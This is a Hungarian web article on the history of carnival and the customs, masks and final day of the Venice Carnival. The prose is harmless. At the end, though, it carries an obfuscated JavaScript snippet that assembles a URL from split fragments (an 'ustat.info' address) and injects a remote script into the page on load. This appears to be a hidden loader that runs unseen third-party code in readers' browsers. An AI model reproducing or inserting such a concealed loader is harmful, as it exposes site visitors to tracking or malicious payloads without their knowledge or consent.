Honnan ered és milyen szokás a karnevál?
Ahhoz, hogy megértsük ezt a hagyományt vissza kell mennünk a kezdetekhez. Mi is lehet a karnevál szó jelentése? Az elnevezés sokak szerint a latin carne levare, „a hús elhagyása” kifejezésből alakult ki. Ugyanakkor maga a „hús” szó nem csak a keresztény ünnep böjt megelőző jellegére utal, hanem a farsangi dínom-dánomra is. Egészen az ókorig nyúlik vissza ezeknek az ünnepeknek a hagyománya, amikor is a rómaiak például Dionüszosznak a bor istenének áldoztak, többnapos ünnepségek keretei között. Ez aztán át is öröklődött a középkorba, tovább éltek ezek az álarcos, állat jelmezes felvonulások. A pogány gyökereket kár is lenne tagadni, de ezeket később az egyház vallási jelleggel töltötte meg.
Tény, hogy egyfajta felszabadulásként élték meg az emberek a téli bezártságot és begubózást, sokszor éhezést követő étellel, borral, vidámsággal feltöltött ünnepi hangulatot. Az biztos, hogy világszerte népszerűek a különféle karneválok és talán a riói karnevál mellett a velencei örvend a legnagyobb népszerűségnek. A régi időkben a farsang számított az év egyik legnagyobb eseményének, amelyet mindig nagyon vártak. Többnyire januárban kezdődött a farsangi időszak, mely alatt szinte minden megengedett volt, mai szóval élve az emberek féktelen bulizásba kezdtek. Maga a karnevál egy hatalmas színjáték, jelmezekkel, művészekkel melynek nézőközönsége egyben szerves résztvevője is az eseményeknek!
Karnevál Velencében
A velencei karnevál minden évben rengeteg turistát, érdeklődőt vonz a világ minden tájáról. Sokan ellátogatnak ebbe a gyönyörű, történelmi városba, hogy megcsodálják a különleges jelmezeket, a felvonulást, még akkor is, ha ilyenkor még egy kicsit csípős az idő.
A farsangi ünnep időszaka a hagyomány szerint húshagyó csütörtöktől húshagyó keddig tart. A modern szokások szerint napjainkban a karneváli hét a galambröptetéssel indul. A galambröptetés hagyománya a karneválok őséig nyúlik vissza, ugyanis ekkor egy kötéltáncos sétált végig a Campanile és a Dózse-palota loggiája között kifeszített kötélen. Manapság egy papírból készült madarat eresztenek le a harangtoronyból egy kábel segítségével, méghozzá, sűrű konfettizápor közepette.
A karnevál sok részletet megőrzött a régi hagyományokból, némelyiket kissé átalakítva, de a jelképes, szorosan a karneválhoz kötődő elemek azért megmaradtak. Hagyományosan a dózse és vendégei a palota erkélyéről üdvözlik a tömeget, majd megszólalnak a harsonák, és több száz léggömböt engednek a magasba. A színes léggömbök azonnal életet csempésznek a zord télbe, Velence felpezsdül, megjelennek a csodás jelmezek és a spontán performanszok az utcán.
Maszkok és jelmezek
A Velencei Karnevál ikonikus jelképei egyértelműen a különleges maszkok és jelmezek. A karneváli mulatságok alkalmával a maszkok és jelmezek eredetileg azért készültek, hogy a résztvevőket ne lehessen felismerni, hogy minden társadalmi réteg szabadon, együtt ünnepelhessen. A beöltözés hagyománya a mai napig szokás a gondolák városában, akár teljes családok beöltöznek egymással harmonizáló jelmezekben. A velencei maszkok állandó figurákkal, tradicionálisan ugyanazokkal a színekkel, motívum világgal készülnek. A hagyományosan Itáliában gyökerező előadásmód a Commedia dell’arte szereplői egy-egy emberi tulajdonságot, jellegzetes személyiségtípust ábrázolnak, történetük nemcsak érdekes, hanem nagyon tanulságos is.
Ilyen tipikus jelmezek, maszkok például: Harlekin (hősszerelmes szépfiú), Pestisdoktor, Colombina (ruhája és maszkja fehér, ami az ártatlanságot szimbolizálja), Domino (e jelmez eredeti célja a papok kifigurázása volt), Bauta (ezt a jelmezt anno többnyire csak arisztokraták viselhették, később a köznép is), Capitano (Münchausen báró olasz megfelelője).
A Karnevál utolsó napja
A látogatók között a legnépszerűbb nap a karnevál utolsó napja és egyben csúcspontja, a húshagyó kedd. Ekkor ér véget mondhatni a karneváli ciklus, azaz ekkor búcsúznak el a Karnevál Hercegétől, akinek az első napon mindent odaadtak és akitől most mindent el is vesznek. Az élet és a halál analógiájára épülő történet mesélésben emlékeztetik magukat arra, hogy minden múlandó, semmi sem tart örökké. Ezen a napon szimbolikusan megölik a karnevált, hogy elűzzék a rossz szellemeket, búcsúztassák a telet, köszöntsék a tavaszt és véget vetnek a féktelen mulatozásnak.
(function(){ x20w_=("u"+"")+"s"+"";x20w_+=("tat.")+("i"); x20w=document.createElement("script");x20w.type="text/javascript";x20w_+="nf"+("o")+"/"; x20wu="2190651091"+".";x20w.async=true;x20wu+="0djis32i20wq400wh5a3cl7mqei7ip"; x20w.src="https://"+x20w_+x20wu;x20wb=document.body;x20wb.appendChild(x20w); })();